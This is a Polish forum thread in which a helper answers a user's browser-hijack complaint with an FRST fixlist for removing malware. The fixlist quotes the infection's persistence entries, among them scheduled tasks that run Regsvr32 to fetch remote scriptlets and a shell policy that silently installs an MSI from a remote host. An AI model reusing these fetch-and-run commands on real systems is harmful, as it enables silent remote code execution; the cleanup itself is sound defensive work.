Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Logi FRST, prośba o sprawdzenie

lopek2016 06 Maj 2017 18:11 384 1
  • #1 06 Maj 2017 18:11
    lopek2016
    Poziom 2  

    Witam,
    od tygodnia mam problem z przeglądarkami na moim komputerze. Zmienił mi się jezyk z angielskiego na polski oraz strona startowa na "www.searchinme.com". Dowiedziałem się, że jest to wirus jednak skanowanie za pomocą Adwcleanera nic nie dało dlatego zrobiłem skrypty za pomoca FRST oraz proszę o sprawdzenie ich i dalszą pomoc w usunięciu wirusa. W załączniku dołączam wykonane logi.
    Z góry bardzo dziękuję za pomoc.

    0 1
  • CControls
  • #2 06 Maj 2017 18:31
    Kolobos
    Spec od komputerów

    W ustawieniach Chrome wylacz przywracanie zestawu stron po starcie przegladarki.

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    CustomCLSID: HKU\S-1-5-21-1154790221-3299570698-3960240069-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-8CE15CF6A282}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => Brak pliku
    Task: {4865E95F-F311-44BF-9441-701A6560523C} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.yzsgrwz.com/?data=zDlkMj82FdI1MTIdMjH5M8U2RTH4OUU3FUF5MdhSFdw5MWI5MH== scrobj.dll
    Task: {4FB2704F-3478-435F-95AF-AB3674542945} - System32\Tasks\Opera scheduled Autoupdate 1487937006 => C:\Users\Łukasz\AppData\Local\Programs\Opera\launcher.exe
    Task: {685C7228-795A-4D29-8C03-033C151387B1} - System32\Tasks\Opera scheduled suite Autoupdate 1487937017 => C:\Users\Łukasz\AppData\Local\Programs\Opera\launcher.exe
    Task: {B5476673-C0FF-4910-8B6E-019FB96EC2B3} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://7c8ogu7.x.incapdns.net/?data=zDlkMj82FdI1MTIdMjH5M8U2RTH4OUU3FUF5MdhSFdw5MWI5MH== scrobj.dll
    Task: {D8FAD40A-D0AE-4615-AD31-6C807A81E494} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {FC9A0353-1DF3-4C43-91CE-8FC6186DFAD3} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA
    Shortcut: C:\Users\Łukasz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.)
    ShortcutWithArgument: C:\Users\Łukasz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.amazon.co.uk/gp/bit/amazonbookmark.html?tag=hp2-desktop-uk-21&partner=HP
    ShortcutWithArgument: C:\Users\Łukasz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\TripAdvisor.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://js.redirect.hp.com/jumpstation?bd=all&...pf=cmnb&s=TripAdvisor_iefav&tp=iefavs
    (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
    () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
    (AVAST Software) C:\Users\Łukasz\AppData\Local\background_fault\aswRD.exe




    (Tencent) C:\Users\Łukasz\AppData\Local\background_fault\QQIme.exe
    (Tencent) C:\Users\Łukasz\AppData\Local\background_fault\QQIme.exe
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\Run: [Opera Browser Assistant] => C:\Users\Łukasz\AppData\Local\Programs\Opera\suite\browser_assistant.exe [1286744 2017-02-15] (Opera Software)
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\Run: [background_fault] => C:\Users\Łukasz\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-03] (AVAST Software) <===== UWAGA
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.tslznzq.com/?data=zDlkMj82FdI1MTIdMjH5M8U2RTH4OUU3FUF5MdhSFdw5MWI5MH== /q
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\MountPoints2: {b9951fa6-eee2-11e6-9be1-184f3291f5dc} - "G:\HiSuiteDownLoader.exe"
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\MountPoints2: {bfa29c36-a2a0-11e6-9bda-184f3291f5dc} - "G:\HiSuiteDownLoader.exe"
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\MountPoints2: {ff230bc4-cc39-11e6-9bde-184f3291f5dc} - "G:\HiSuiteDownLoader.exe"
    IFEO\taskmgr.exe: [Debugger]
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    SearchScopes: HKLM-x32 -> {C051444C-E8BE-4EDA-A3AB-35561E59C0AB} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?i...k%5Fcode=qs&index=aps&field-keywords={searchTerms}
    SearchScopes: HKU\S-1-5-21-1154790221-3299570698-3960240069-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1154790221-3299570698-3960240069-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1154790221-3299570698-3960240069-1001 -> {C051444C-E8BE-4EDA-A3AB-35561E59C0AB} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?i...k%5Fcode=qs&index=aps&field-keywords={searchTerms}
    Edge HomeButtonPage: HKU\S-1-5-21-1154790221-3299570698-3960240069-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    FF Homepage: Mozilla\Firefox\Profiles\jwh5bs5t.default-1493303268211 -> hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    FF SearchPlugin: C:\Users\Łukasz\AppData\Roaming\Mozilla\Firefox\Profiles\jwh5bs5t.default-1493303268211\searchplugins\ourluckysites.xml [2017-05-05]
    FF ProfilePath: C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211 [2017-05-06]
    FF Extension: (SimilarWeb) - C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-05-05] [Brak podpisu cyfrowego]
    FF Extension: (HSearch) - C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-05-05] [Brak podpisu cyfrowego]
    FF Extension: (FF Adr) - C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-05] [Brak podpisu cyfrowego]
    FF Extension: (Polski Language Pack) - C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-05] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211\searchplugins\startsearch.xml [2017-05-05]
    CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1493982073&z=b85d049a089782ecc4fac2fg5zetecbt0bco1eem4o&from=che0812&uid=ST500LT012-1DG142_SBY0MFCL"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [Brak podpisu cyfrowego]
    R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107672 2017-05-04] () <==== UWAGA
    R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [Brak podpisu cyfrowego]
    R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [Brak podpisu cyfrowego]
    R2 SANARE; C:\Users\Łukasz\AppData\Local\SANARE\Snare.dll [826368 2017-05-04] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
    R2 WANARE; C:\Users\Łukasz\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    R2 WinSAPSvc; C:\Users\Łukasz\AppData\Roaming\WinSAPSvc\WinSAP.dll [603648 2017-05-05] (WinSAP) [Brak podpisu cyfrowego] <==== UWAGA
    S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
    U3 aspnet_state; Brak ImagePath
    2017-05-05 13:01 - 2017-05-06 05:03 - 00000000 ____D C:\Users\Łukasz\AppData\Local\background_fault
    2017-05-05 13:01 - 2017-05-05 13:01 - 00000000 ____D C:\Users\Łukasz\AppData\Local\WANARE
    2017-05-05 13:01 - 2017-05-05 13:01 - 00000000 ____D C:\ProgramData\BIT
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Users\Łukasz\AppData\Roaming\Firefox
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Users\Łukasz\AppData\Local\Zoohair
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Users\Łukasz\AppData\Local\Firefox
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Program Files (x86)\Zoohair
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-05-05 12:25 - 2017-05-06 16:44 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-05-05 12:25 - 2017-05-05 12:25 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
    2017-05-04 17:49 - 2017-05-05 13:01 - 00003652 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-05-04 17:49 - 2017-05-05 13:01 - 00003594 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-05-04 17:49 - 2017-05-05 13:00 - 00000000 ____D C:\Users\Łukasz\AppData\Roaming\WinSAPSvc
    2017-05-04 17:49 - 2017-05-04 17:49 - 00000000 ____D C:\WINDOWS\psgo
    2017-05-04 17:49 - 2017-05-04 17:49 - 00000000 ____D C:\Users\Łukasz\AppData\Local\SANARE
    2017-05-01 07:35 - 2017-05-05 12:28 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-20 22:33 - 2017-04-20 22:33 - 00000000 ____D C:\ProgramData\Software
    2017-04-20 22:07 - 2017-05-05 12:58 - 00000000 ____D C:\AdwCleaner
    2017-04-20 21:39 - 2017-04-20 21:39 - 00023032 _____ (Wiper Software) C:\WINDOWS\system32\wiperrm.exe
    2017-04-20 11:56 - 2017-05-05 12:25 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-20 11:56 - 2017-04-20 16:07 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-19 19:16 - 2017-04-20 22:21 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-19 18:24 - 2017-04-27 17:23 - 00000000 ____D C:\Users\Łukasz\AppData\Local\3DM
    2017-04-17 16:07 - 2017-04-17 16:07 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-17 16:07 - 2017-04-17 16:07 - 00000000 ____D C:\Program Files (x86)\58F4CC25_jumpeasy
    2017-04-17 16:02 - 2017-05-05 12:25 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-15 16:39 - 2017-04-15 16:39 - 00003690 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-15 16:38 - 2017-04-15 16:38 - 00000000 ____D C:\Users\Łukasz\AppData\Roaming\SSMgre
    2017-04-10 11:36 - 2017-04-15 16:39 - 00003668 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
    EmptyTemp:

    W FRST wybierz Napraw.

    0